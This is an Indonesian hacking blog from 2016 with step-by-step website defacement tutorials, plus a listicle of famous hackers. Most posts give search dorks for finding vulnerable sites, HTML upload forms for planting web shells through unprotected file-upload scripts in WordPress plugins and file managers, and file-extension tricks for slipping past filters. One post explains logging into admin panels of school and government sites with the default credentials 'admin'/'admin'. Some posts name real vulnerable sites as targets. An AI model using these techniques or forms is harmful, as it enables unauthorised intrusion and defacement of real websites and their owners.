Sabtu, 16 April 2016

Tutorial Deface Dengan Roxy File Manager


       
  
    Sekarang Lanjut Ke Tutorial Selanjutnya :v

"Tutorial Deface Dengan Roxy File Manager" , 

OK . Langsung Aja Baca Artikel Di Bwah Ini Sambil Duduk Manis Sambil Makan Cemilan . 

Dork : "inurl:/fileman intitle:index of

  Cari Targetnya dengan dork yg diatas

Klau udah dapat targetnya langsung nanti ada tulisan di title webnya "Roxy File Manager"

gambarnya kyak gini




Klau udah Nemu Sisa Upload Shellnya di add file 

Saya Sarankan shell extensinya kyak gini yah  : shell.php.ndsxf atau shell.php2

klau mau panggil shellnya : "target.com/(path)/fileman/Uploads/shellmu"


Ok Gitu Aja Mudahkan :v , Kalau Ada Salah Ketik Atau Kurang Vaham Isi Komentarnya Dibawah :D .


Thanks To : PhantomGhost - Sulawesi IT Sec

My Facebook : https://www.facebook.com/marselERROR

Fanspage : https://www.facebook.com/Mr3RR0R-1605930586394122/


Kamis, 14 April 2016

Cfg-ContactForm File Upload Vulnerable



     Ketemu Lagi Ama Saya Sitamvan Dari Gua Hantu :v :v

Sekarang Saya Akan Ngeshare Tutorial "Cfg-ContactForm File Upload Vulnerable"

Klau Gitu , Langsung Aja Baca Artikel Dibawah Ini Vro :D

DORK : "index of" "cfg-contact-from-1" atau bisa jg "index of" "cfg-contact-from-2" 

tergantung webnya doang :v 

CSRF : 

<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>

  Cari Target nya dulu dengan dork yg diatas :v .

Klau udah dapat langsung aja tambah di belakang web kyak gni

http://target.com/cfg-contactform-1/inc/upload.php

Klau Vuln Nanti Ada Tulisan {filename} blablabla :v

Klau udah sisa upload doang pake CSRF yang diatas tadi :D

Klau udah di upload , cara manggil shellnya gini : target.com/cfg-contactform-1/upload/shellmu.php

Ok gitu aja kok .

Klau ada salah ketik atau salah paham mohon di maafkan :v


Exploit Author : People_hurt a.k.a Ariel Peterpan | Incef Team

Thanks To : PhantomGhost - Sulawesi IT Sec - Mr.3RR0R

My Facebook : https://www.facebook.com/marselERROR

Fanspage : https://www.facebook.com/Ghosts.phtml - https://mobile.facebook.com/Mr3RR0R-1605930586394122/


Rabu, 13 April 2016

14 Hacker Terbaik Di Dunia




       hy sobat , sekarang bahas bahas exploitnya udah dulu .

sekarang sya akan memperkenalkan kalian hacker-hacker terbaik di dunia .

ok tanpa langsung basa basi silahkan baca artikelnya

Inilah 14 hacker terbaik di dunia menurut Blog Saya :v

   Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.
Berikut beberapa profile 14 Hacker Terbaik Dunia untuk saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster “FBI Most Wanted”.
Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.
Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.
Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.
Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.
Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)
Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.
Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.
Merasa terganggu oleh software komersial dan dan hak cipta pribadi.
Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.
Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.


7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.


8. Ian Murphy
Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.
Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon “tengah malam” pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.


9. Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University.
Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar.
Ditangkap Interpol di Heathrow Airport pada tahun 1995


10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untukkepentingan sendiri.


11. Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick.


12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.


13. Eric Steven Raymond
Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.
Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.
Menurut Eric, “dunia mempunyai banyak persoalan menarik danmenanti untuk dipecahkan”.


14. Johan Helsingius
Mengoperasikan anonymous remailer paling populer didunia.


Thanks To : PhantomGhost - Sulawesi IT Sec

My Facebook : https://www.facebook.com/marselERROR



Selasa, 05 April 2016

Tutorial Deface Dengan Metode Viral_Optins v2


   

     Hallo!!!!!!! , Berjumpa Lagi Sama Mr.3RR0R  :v

Gmana Kabarnya.? , Pasti Lagi Online , Sambil Duduk :D

Klau Gitu Saya Lagi Berbagi "Tutorial Deface Dengan Viral_Optins v2"

Langsung Aja Ke Tempat Pembelajaran

- Dork : "inurl:/wp-content/plugins/viral-optins/" ( tanpa tanda " )

Exploit : http://target/wp-content/plugins/viral-optins/api/uploader/file-uploader.php


CSRF : 



<font color="red">
<h1 align="center">Upload Shell</h1></font>
<br>
<body background="black"><style>body {background:black}
input,submit {border:1px;solid green;color:green}</style><center>
<form method="POST" action="target" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">


</form></body>

      Langsung Aja Pergi Ke Google.com , Terus Gunakan Dorknya 

terus Cari Target , Klau dapat masukin Exploit Yang Ada Diatas.

Kalau Vuln Nanti Tuh Tidak Ada tulisan (Blank) .

Upload Deh file yg Berextensi .jpg .png .txt dll (html atau php nggak bisa :v)

Akses file : http://target/wp-content/uploads/(tahun)/(bulan)/file


Vuln Target :"http://ailisgarcia.com/wp-content/plugins/viral-optins/api/uploader/file-
uploader.php"


Exploit Author : Mr.3RR0R (PhantomGhost)


My Facebook : https://www.facebook.com/marselERROR

Forum : phantom-ghost.org

Fanspage : https://www.facebook.com/PG.phtml/

Tutorial Deface Dengan Default User Admin



       Halluuu . Sekarang Saya Akan Membahas "Tutorial Deface Dengan Default User Admin"

Ini Teknik Yang Sering Saya Gunakan Dan Teknik Ini Sangat Mudah Dipelajari.

Kalau Begitu Langsung Aja Ke Tempat Pembelajaran :D

Alat Yang Digunakan :D :

- Laptop/PC/Hp

- KeyBoard

- Kalau Bisa Sih Secangkir Kopi :D

Bahan Yang Digunakan : 

- Dork : "inurl:/html/index.php?berita site:sch.id" bisa jg go.id , ac.id , co.id atau id

- Path admin : www.site.com/admin/index.php

         
       Kalau Alat Dan Bahannya Sudah Lengkap Langsung aja

Cari Targetnya , contoh : www.site.com/html/index.php?id=berita

Ubah Tuh Menjadi www.site.com/admin/ 

klau udah , Nanti Ke Redict Ke Halaman Adminnya Kok  :D

Setelah Itu Masukin User Name Dan Passwordnya , user dan passwordnya : "admin"

Kalau Webnya Vuln Nanti Ke Redict Sendiri Kok Ke Halaman Adminnya

Kyak Gini "www.site.com/admin/admin.php"

Kalau Udah Gitu Terserah Kalian Mau Apain Tuh Website


Vuln Target :  http://www.palatahzan.org/admin/


terima kasih :D , salah dan kurangnya mohon di maafkan :D


Thanks To : 4prili666h05T - VANKAS7IC - JackWho - Mr.Aljabar - Mr.3RR0R - gekikara404 - Mr.DeFroz - KidSZonk - Harith101

Fanspage : https://ww.facebook.com/PG.phtml

Facebook Saya : https://www.facebook.com/marselERROR
                      

Senin, 21 Maret 2016

Tutorial Deface Dengan Uploadify

Selamat Datang Di Blog Saya

Nih Saya Saya Nge Share Tutorial Deface Dengan Uploadify :v .

Maaf Kalau Sudah Tau Exploit ini , Soalnya Nih Exploit Udah Lama

Biarkan Para Newbie Berkreasi :D

OK Langsung Aja Ke Tempat Perkara Kejadian .




Dork:
inurl:/uploadify/ intitle:index of ( Ini Cuman Dork Default , Kembangin Aja Sendiri Biar Dapat Banyak )

Kalau Udah Dapat Pake Exploit Di Bawah

Exploit: target/(path)/uploadify/uploadify.php

Kalau Webnya Tdk Ada Gambarnya (blank) Berarti Webnya Vulnerable

Kalau Udah Dapat Copy Dibawah Ini Langsung CSRF nya

CSRF :

<form
action="http://target.co.li/themes/zicepanel/components/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>

Klau Sudah Di Upload , Klau Keluar Tanda 1 Berarti Berhasil , Tetapi Klau Blank . Cari Target Lain


Path Shell Yang Sudah Di Upload

www.target.com/shellkamu.php


Ok Sekian Dan Terima Kasih


Facebook : https://www.facebook.com/marselERROR

Forum      : phantom-ghost.org

Fanspage : https://www.facebook.com/Ghosts.phtml











Selasa, 15 Maret 2016

Wordpress Plugins impact-template-editor Vulnerability

Assalamualaikum :D

Sekarang Saya Akan Membagikan Tutorial Wordpress Plugins impact-template-editor Vulnerability

Yups, Plugins ini punya bug!  di plugins ini dia include KCFinder  Tau lah kan KCFinder gmana .  Yuk 


Langsung Aja!





Default Dork :/wp-content/plugins/impact-template-editor/   ( Kembangin Lagi yah biar dapat banyak )

Exploit : /wp-content/plugins/impact-template-editor/lib/kcfinder/browse.php


Kalau Udah Di Dapat , Tinggal Upload Shell Kalian , Tpi Harus Berextensi  php2 , php.asp , php4 ,

php.ndsxf

Akses Shellnya :  http://[target]/upload/impact/shellkamu.php 

Ok Sekian Dulu Yah

Wassalamualaikum. Wr. Wb.

Author : Putra Attacker | ./MR.INTERCEPTION

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://www.facebook.com/Ghosts.phtml

Forum : http://phantom-ghost.org